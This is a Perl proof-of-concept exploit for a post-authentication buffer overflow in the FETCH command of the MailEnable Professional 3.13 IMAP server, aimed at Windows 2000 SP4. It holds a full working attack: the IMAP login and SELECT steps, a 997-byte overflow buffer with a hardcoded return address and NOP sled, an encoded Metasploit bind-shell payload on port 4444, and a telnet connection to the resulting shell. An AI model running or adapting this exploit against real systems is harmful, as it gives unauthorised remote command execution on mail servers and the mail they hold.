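#!/usr/bin/perl
# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
#
# Bind Shell POC Exploit for Win2K SP4 pro English
#
# Found by   : Luigi Auriemma
# Advisory   : http://aluigi.altervista.org/adv/maildisable-adv.txt
#
# Exploit by : haluznik | haluznikgmail.com
#
# 10.3.2008 ..enjoy!:]
#
# Usage: perl imap.pl [Host] [User] [Pass]
#
# The vulnerable FETCH handling is only reached after a successful
# LOGIN, so a valid IMAP account on the target is required.  The
# return address and the payload below are specific to Win2K SP4
# Professional (English) and to listener port 4444; both have to be
# regenerated for any other target or port.
# =================================================================
use strict;
use warnings;
use IO::Socket;

print "\n [*] MailEnable Professional 3.13 imap remote exploit";
print "\n [*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n";

if (@ARGV < 3) {
    print " [!] Use: perl imap.pl [Host] [User] [Pass]\n";
    exit 1;
}

my ($host, $user, $pass) = @ARGV;
my $port      = 143;     # IMAP
my $bind_port = 4444;    # port the bind-shell payload listens on (baked into $shellcode)

# Metasploit bind-shell payload (listener on port 4444), encoded so that it
# contains none of the bytes the FETCH argument parser rejects or treats as
# delimiters:
#   bad chars: 0x00 0x0A 0x0D 0x20 0x29
# The listener port is embedded in these bytes; changing it means
# regenerating the payload with the same bad-char list.
my $shellcode =
    "\x2b\xc9\x66\x81\xe9\xb0\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
    "\x0e\xe6\x02\xe4\x6f\x83\xee\xfc\xe2\xf4\x1a\x68\x0f\x22\x0e\xfb" .
    "\x1b\x90\x19\x62\x6f\x03\xc2\x26\x6f\x2a\xda\x89\x98\x6a\x9e\x03" .
    "\x0b\xe4\xa9\x1a\x6f\x30\xc6\x03\x0f\x26\x6d\x36\x6f\x6e\x08\x33" .
    "\x24\xf6\x4a\x86\x24\x1b\xe1\xc3\x2e\x62\xe7\xc0\x0f\x9b\xdd\x56" .
    "\xc0\x47\x93\xe7\x6f\x30\xc2\x03\x0f\x09\x6d\x0e\xaf\xe4\xb9\x1e" .
    "\xe5\x84\xe5\x2e\x6f\xe6\x8a\x26\xf8\x0e\x25\x33\x3f\x0b\x6d\x41" .
    "\xd4\xe4\xa6\x0e\x6f\x1f\xfa\xaf\x6f\x2f\xee\x5c\x8c\xe1\xa8\x0c" .
    "\x08\x3f\x19\xd4\x82\x3c\x80\x6a\xd7\x5d\x8e\x75\x97\x5d\xb9\x56" .
    "\x1b\xbf\x8e\xc9\x09\x93\xdd\x52\x1b\xb9\xb9\x8b\x01\x09\x67\xef" .
    "\xec\x6d\xb3\x68\xe6\x90\x36\x6a\x3d\x66\x13\xaf\xb3\x90\x30\x51" .
    "\xb7\x3c\xb5\x51\xa7\x3c\xa5\x51\x1b\xbf\x80\x6a\xf5\x33\x80\x51" .
    "\x6d\x8e\x73\x6a\x40\x75\x96\xc5\xb3\x90\x30\x68\xf4\x3e\xb3\xfd" .
    "\x34\x07\x42\xaf\xca\x86\xb1\xfd\x32\x3c\xb3\xfd\x34\x07\x03\x4b" .
    "\x62\x26\xb1\xfd\x32\x3f\xb2\x56\xb1\x90\x36\x91\x8c\x88\x9f\xc4" .
    "\x9d\x38\x19\xd4\xb1\x90\x36\x64\x8e\x0b\x80\x6a\x87\x02\x6f\xe7" .
    "\x8e\x3f\xbf\x2b\x28\xe6\x01\x68\xa0\xe6\x04\x33\x24\x9c\x4c\xfc" .
    "\xa6\x42\x18\x40\xc8\xfc\x6b\x78\xdc\xc4\x4d\xa9\x8c\x1d\x18\xb1" .
    "\xf2\x90\x93\x46\x1b\xb9\xbd\x55\xb6\x3e\xb7\x53\x8e\x6e\xb7\x53" .
    "\xb1\x3e\x19\xd2\x8c\xc2\x3f\x07\x2a\x3c\x19\xd4\x8e\x90\x19\x35" .
    "\x1b\xbf\x6d\x55\x18\xec\x22\x66\x1b\xb9\xb4\xfd\x34\x07\x16\x88" .
    "\xe0\x30\xb5\xfd\x32\x90\x36\x02\xe4\x6f";

# Overflow buffer layout for Win2K SP4 Professional (English):
#   997 bytes of filler up to the saved return address,
#   0x7c4fedbb overwriting it (a Win2K SP4 system-DLL address; presumably
#   a jump back into the controlled buffer -- not verified here),
#   a short NOP sled, then the payload.
my $offset   = 997;
my $ret_addr = "\xbb\xed\x4f\x7c";   # 0x7c4fedbb, little-endian
my $nop_sled = "\x90" x 20;
my $buff     = ("A" x $offset) . $ret_addr . $nop_sled . $shellcode;

my $socket = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
) or die " [-] cannot connect to host! ($@)\n";

my $reply;

# Server greeting.
defined recv($socket, $reply, 1024, 0) or die " [-] recv failed: $!\n";
print " [i] " . $reply;

print " [+] logging..\n";
# Credentials are sent as bare atoms, exactly as in the original PoC.  A
# user name or password containing spaces, quotes or parentheses would have
# to be sent as an IMAP quoted string instead (RFC 3501 astring).
my $exploit = "a001 LOGIN " . $user . " " . $pass . "\r\n";
defined send($socket, $exploit, 0) or die " [-] send failed: $!\n";
defined recv($socket, $reply, 1024, 0) or die " [-] recv failed: $!\n";
print " [i] " . $reply;

# The overflow is post-authentication: without a tagged OK to LOGIN the
# oversized FETCH is simply rejected, so stop here rather than report a
# payload that was never delivered.
if ($reply =~ /^a001 (?:NO|BAD)\b/m) {
    die " [-] login failed; the overflow is only reachable after LOGIN\n";
}
elsif ($reply !~ /^a001 OK\b/m) {
    warn " [!] no tagged LOGIN response seen yet, continuing anyway\n";
}

$exploit = "a002 SELECT INBOX" . "\r\n";
defined send($socket, $exploit, 0) or die " [-] send failed: $!\n";
# Drain the SELECT response so it is not mistaken for the FETCH reply.
defined recv($socket, $reply, 1024, 0) or die " [-] recv failed: $!\n";
print " [i] " . $reply;

print " [+] sending evil payload..\n";
# The sequence set is harmless; the oversized data item that follows it is
# what overruns the buffer in the FETCH argument handling.
$exploit = "a003 FETCH 1:4 " . $buff . "\r\n";
defined send($socket, $exploit, 0) or die " [-] send failed: $!\n";
print " [*] exploiting done!\n";

print " [*] connecting to port $bind_port of $host\n";
sleep 6;   # give the payload time to bind its listener

# List-form system(): $host comes straight from the command line and must
# never be interpolated into a shell command string.
system('telnet', $host, $bind_port) == 0
    or warn " [!] telnet exited with status " . ($? >> 8) . "\n";

close $socket;
exit 0;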